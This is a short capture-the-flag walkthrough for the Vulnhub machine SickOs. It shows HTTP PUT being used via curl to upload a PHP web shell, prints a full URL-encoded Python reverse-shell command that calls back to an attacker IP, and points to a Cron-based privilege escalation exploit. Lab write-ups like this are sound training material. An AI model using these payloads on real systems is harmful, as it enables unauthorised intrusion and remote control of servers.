SickOs

Vulnhub / Web / Curl / Cron

Another fun machine. Here we utilize the Curl command to inject a shell. From there, you privesc off of a vulnerable application running from Cron.

Using curl we can see our server allowed options. Look at the “Allow: PUT” option. This allows us to place & PUT content onto the server.

curl -v -X OPTIONS IP/Options_Folder

Below we sampled the command to see if it worked. We successfully placed a shell with php system call commands.

Take note of the IP to ensure you change the shell to point to your IP for call back.

http://192.168.233.147/test/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%22192.168.233.146%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27

After obtaining a shell enumerate the system privilege escalation points. You can use G0tm1lk’s guide found here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

We now use printf to place a one-liner into the update file which we’ll call by Cron according to EDB @ https://www.exploit-db.com/exploits/33899